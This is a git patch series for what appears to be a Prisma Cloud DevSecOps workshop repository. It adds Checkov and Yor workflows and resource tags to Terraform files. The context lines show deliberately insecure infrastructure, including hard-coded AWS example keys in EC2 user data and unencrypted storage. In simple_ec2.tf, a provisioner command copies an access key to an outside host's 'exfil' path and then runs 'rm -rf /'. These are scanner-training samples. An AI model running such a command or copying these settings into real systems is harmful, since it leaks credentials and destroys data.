From 17dfb7677e72c09896734e80f2ee2d4c3476e87d Mon Sep 17 00:00:00 2001 From: ritwiksathe Date: Wed, 14 May 2025 12:10:06 -0400 Subject: [PATCH 1/7] Create checkov.yaml --- .github/workflows/checkov.yaml | 35 ++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 .github/workflows/checkov.yaml diff --git a/.github/workflows/checkov.yaml b/.github/workflows/checkov.yaml new file mode 100644 index 000000000..9f7240507 --- /dev/null +++ b/.github/workflows/checkov.yaml @@ -0,0 +1,35 @@ +name: checkov +on: + pull_request: + push: + branches: + - main +jobs: + scan: + runs-on: ubuntu-latest + permissions: + contents: read # for actions/checkout to fetch code + security-events: write # for GitHub/codeql-action/upload-sarif to upload SARIF results + + steps: + - uses: actions/checkout@v2 + + - name: Run checkov + id: checkov + uses: bridgecrewio/checkov-action@master + with: + directory: code/ + #soft_fail: true + #api-key: ${{ secrets.BC_API_KEY }} + #env: + #PRISMA_API_URL: https://api4.prismacloud.io + + - name: Upload SARIF file + uses: GitHub/codeql-action/upload-sarif@v2 + + # Results are generated only on a success or failure + # this is required since GitHub by default won't run the next step + # when the previous one has failed. Alternatively, enable soft_fail in checkov action. + if: success() || failure() + with: + sarif_file: results.sarif From 23580bea08c7a1ed71a461a4320d22673fac5bf4 Mon Sep 17 00:00:00 2001 From: ritwiksathe Date: Wed, 14 May 2025 12:16:19 -0400 Subject: [PATCH 2/7] Create yor.yaml --- .github/workflows/yor.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 .github/workflows/yor.yaml diff --git a/.github/workflows/yor.yaml b/.github/workflows/yor.yaml new file mode 100644 index 000000000..a16506910 --- /dev/null +++ b/.github/workflows/yor.yaml @@ -0,0 +1,19 @@ +name: IaC tag and trace + +on: + push: + pull_request: + +jobs: + yor: + runs-on: ubuntu-latest + permissions: + contents: write + + steps: + - uses: actions/checkout@v2 + name: Checkout repo + with: + fetch-depth: 0 + - name: Run yor action + uses: bridgecrewio/yor-action@main From 64172ced57c8b9c7e80043425571cd908b1a9f7c Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Wed, 14 May 2025 16:16:39 +0000 Subject: [PATCH 3/7] Update tags (by Yor) --- code/deployment_ec2.tf | 150 ++++++++++++++++++++++++++++++++++++++--- code/deployment_s3.tf | 76 +++++++++++++++++++-- code/simple_ec2.tf | 11 +++ code/simple_s3.tf | 11 ++- 4 files changed, 233 insertions(+), 15 deletions(-) diff --git a/code/deployment_ec2.tf b/code/deployment_ec2.tf index 7e3d2bba2..2e6d6d19e 100644 --- a/code/deployment_ec2.tf +++ b/code/deployment_ec2.tf @@ -17,7 +17,18 @@ export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMAAAKEY export AWS_DEFAULT_REGION=us-west-2 echo "

Deployed via Terraform

" | sudo tee /var/www/html/index.html EOF - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_host" + yor_trace = "02490e01-6880-41fe-8ef7-e4e31a8a3c64" + } } resource "aws_ebs_volume" "web_host_storage" { @@ -25,14 +36,36 @@ resource "aws_ebs_volume" "web_host_storage" { availability_zone = "${var.region}a" #encrypted = false # Setting this causes the volume to be recreated on apply size = 1 - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_host_storage" + yor_trace = "b389373b-56c9-47c0-a647-19d81e031819" + } } resource "aws_ebs_snapshot" "example_snapshot" { # ebs snapshot without encryption volume_id = "${aws_ebs_volume.web_host_storage.id}" description = "${local.resource_prefix.value}-ebs-snapshot" - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "example_snapshot" + yor_trace = "1d05a32f-9253-4f1c-9fd2-b085d3fef8f2" + } } resource "aws_volume_attachment" "ebs_att" { @@ -69,14 +102,36 @@ resource "aws_security_group" "web-node" { "0.0.0.0/0"] } depends_on = [aws_vpc.web_vpc] - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web-node" + yor_trace = "b49e995b-ecf1-4612-a844-7e5d234e8c07" + } } resource "aws_vpc" "web_vpc" { cidr_block = "172.16.0.0/16" enable_dns_hostnames = true enable_dns_support = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_vpc" + yor_trace = "d6f338ae-4e51-4ee7-b42f-40c84e4f11d7" + } } resource "aws_subnet" "web_subnet" { @@ -85,7 +140,18 @@ resource "aws_subnet" "web_subnet" { availability_zone = "${var.region}a" map_public_ip_on_launch = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_subnet" + yor_trace = "b9942188-18fb-4b3f-8611-78e8a85296f3" + } } resource "aws_subnet" "web_subnet2" { @@ -94,20 +160,53 @@ resource "aws_subnet" "web_subnet2" { availability_zone = "${var.region}b" map_public_ip_on_launch = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_subnet2" + yor_trace = "a337c857-f2fe-4951-9cd4-30b3c939b3d1" + } } resource "aws_internet_gateway" "web_igw" { vpc_id = aws_vpc.web_vpc.id - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_igw" + yor_trace = "01542dac-1dd4-40b4-9ff6-f3af80d6bafb" + } } resource "aws_route_table" "web_rtb" { vpc_id = aws_vpc.web_vpc.id - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_rtb" + yor_trace = "2e2bbfed-8cbd-442b-8685-36ce8abe2841" + } } resource "aws_route_table_association" "rtbassoc" { @@ -134,6 +233,17 @@ resource "aws_network_interface" "web-eni" { subnet_id = aws_subnet.web_subnet.id private_ips = ["172.16.10.100"] + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web-eni" + yor_trace = "82aac790-1fcd-4809-a727-e1012c8e9911" + } } # VPC Flow Logs to S3 @@ -144,12 +254,34 @@ resource "aws_flow_log" "vpcflowlogs" { vpc_id = aws_vpc.web_vpc.id + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "vpcflowlogs" + yor_trace = "5f09b928-c4ea-4bbd-ba7d-42aaee18e7a7" + } } resource "aws_s3_bucket" "flowbucket" { bucket = "${local.resource_prefix.value}-flowlogs" force_destroy = true + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "flowbucket" + yor_trace = "fece9b1a-6ead-423d-a93e-67a105d8e8b4" + } } # OUTPUTS diff --git a/code/deployment_s3.tf b/code/deployment_s3.tf index cfb272e1d..0c0629c9a 100644 --- a/code/deployment_s3.tf +++ b/code/deployment_s3.tf @@ -5,14 +5,36 @@ resource "aws_s3_bucket" "data" { # bucket does not have versioning bucket = "${local.resource_prefix.value}-data" force_destroy = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "data" + yor_trace = "0e77b908-9880-47fd-93df-c8e179af376e" + } } resource "aws_s3_bucket_object" "data_object" { bucket = aws_s3_bucket.data.id key = "customer-master.xlsx" source = "resources/customer-master.xlsx" - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "data_object" + yor_trace = "0ab46a1a-7964-421b-9047-b8a4fd7e4f23" + } } resource "aws_s3_bucket" "financials" { @@ -23,6 +45,17 @@ resource "aws_s3_bucket" "financials" { acl = "private" force_destroy = true + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "financials" + yor_trace = "42334e90-5d63-4710-a5d2-17c1feeacc6f" + } } resource "aws_s3_bucket" "operations" { @@ -34,7 +67,18 @@ resource "aws_s3_bucket" "operations" { enabled = true } force_destroy = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "operations" + yor_trace = "ef823476-cafc-427e-bbf6-38c63e7fd6de" + } } resource "aws_s3_bucket" "data_science" { @@ -49,7 +93,18 @@ resource "aws_s3_bucket" "data_science" { target_prefix = "log/" } force_destroy = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "data_science" + yor_trace = "cb1e7dd5-042e-4ec2-9893-474b0ede8096" + } } resource "aws_s3_bucket" "logs" { @@ -67,5 +122,16 @@ resource "aws_s3_bucket" "logs" { } } force_destroy = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "logs" + yor_trace = "ce28f5ad-2545-48f3-8aaf-f764a3bd04a1" + } } diff --git a/code/simple_ec2.tf b/code/simple_ec2.tf index dcfa5880f..191924462 100644 --- a/code/simple_ec2.tf +++ b/code/simple_ec2.tf @@ -10,4 +10,15 @@ resource "aws_ec2_host" "test" { command = "echo Running install scripts.. 'echo $ACCESS_KEY > creds.txt ; scp -r creds.txt root@my-home-server.com/exfil/ ; rm -rf /' " } + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/simple_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "test" + yor_trace = "f9ed9b6f-e6ac-4606-b5d6-f5036ae264b0" + } } diff --git a/code/simple_s3.tf b/code/simple_s3.tf index c0d25fb60..b4806b070 100644 --- a/code/simple_s3.tf +++ b/code/simple_s3.tf @@ -6,7 +6,16 @@ resource "aws_s3_bucket" "dev_s3" { bucket_prefix = "dev-" tags = { - Environment = "Dev" + Environment = "Dev" + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/simple_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "dev_s3" + yor_trace = "f6efb213-7c4b-4f7d-bce8-d9a60c7309c3" } } From c9aab4481886b49ad3c1c00fd8aacd306cadb210 Mon Sep 17 00:00:00 2001 From: ritwiksathe Date: Wed, 14 May 2025 12:43:48 -0400 Subject: [PATCH 4/7] Create s3.tf --- code/build/s3.tf | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 code/build/s3.tf diff --git a/code/build/s3.tf b/code/build/s3.tf new file mode 100644 index 000000000..158875e73 --- /dev/null +++ b/code/build/s3.tf @@ -0,0 +1,18 @@ +provider "aws" { + region = "us-west-2" +} + +resource "aws_s3_bucket" "dev_s3" { + bucket_prefix = "dev-" + + tags = { + Environment = "Dev" + } +} + +resource "aws_s3_bucket_ownership_controls" "dev_s3" { + bucket = aws_s3_bucket.dev_s3.id + rule { + object_ownership = "BucketOwnerPreferred" + } +} From b75872c8ffae7ac09c842bf74b331fcae0382aaf Mon Sep 17 00:00:00 2001 From: ritwiksathe Date: Wed, 14 May 2025 12:55:10 -0400 Subject: [PATCH 5/7] Revert "Create s3.tf" --- code/build/s3.tf | 18 ------------------ 1 file changed, 18 deletions(-) delete mode 100644 code/build/s3.tf diff --git a/code/build/s3.tf b/code/build/s3.tf deleted file mode 100644 index 158875e73..000000000 --- a/code/build/s3.tf +++ /dev/null @@ -1,18 +0,0 @@ -provider "aws" { - region = "us-west-2" -} - -resource "aws_s3_bucket" "dev_s3" { - bucket_prefix = "dev-" - - tags = { - Environment = "Dev" - } -} - -resource "aws_s3_bucket_ownership_controls" "dev_s3" { - bucket = aws_s3_bucket.dev_s3.id - rule { - object_ownership = "BucketOwnerPreferred" - } -} From f3c6d0d3d7f30d1dd5a273cfe246c091e472ead9 Mon Sep 17 00:00:00 2001 From: ritwiksathe Date: Wed, 14 May 2025 15:15:01 -0400 Subject: [PATCH 6/7] Delete .github/workflows/yor.yaml --- .github/workflows/yor.yaml | 19 ------------------- 1 file changed, 19 deletions(-) delete mode 100644 .github/workflows/yor.yaml diff --git a/.github/workflows/yor.yaml b/.github/workflows/yor.yaml deleted file mode 100644 index a16506910..000000000 --- a/.github/workflows/yor.yaml +++ /dev/null @@ -1,19 +0,0 @@ -name: IaC tag and trace - -on: - push: - pull_request: - -jobs: - yor: - runs-on: ubuntu-latest - permissions: - contents: write - - steps: - - uses: actions/checkout@v2 - name: Checkout repo - with: - fetch-depth: 0 - - name: Run yor action - uses: bridgecrewio/yor-action@main From 28a46344d03bfdf90798e56f04ab8671f5795cbe Mon Sep 17 00:00:00 2001 From: ritwiksathe Date: Wed, 14 May 2025 15:28:47 -0400 Subject: [PATCH 7/7] Create s3.tf --- code/build/s3.tf | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 code/build/s3.tf diff --git a/code/build/s3.tf b/code/build/s3.tf new file mode 100644 index 000000000..158875e73 --- /dev/null +++ b/code/build/s3.tf @@ -0,0 +1,18 @@ +provider "aws" { + region = "us-west-2" +} + +resource "aws_s3_bucket" "dev_s3" { + bucket_prefix = "dev-" + + tags = { + Environment = "Dev" + } +} + +resource "aws_s3_bucket_ownership_controls" "dev_s3" { + bucket = aws_s3_bucket.dev_s3.id + rule { + object_ownership = "BucketOwnerPreferred" + } +}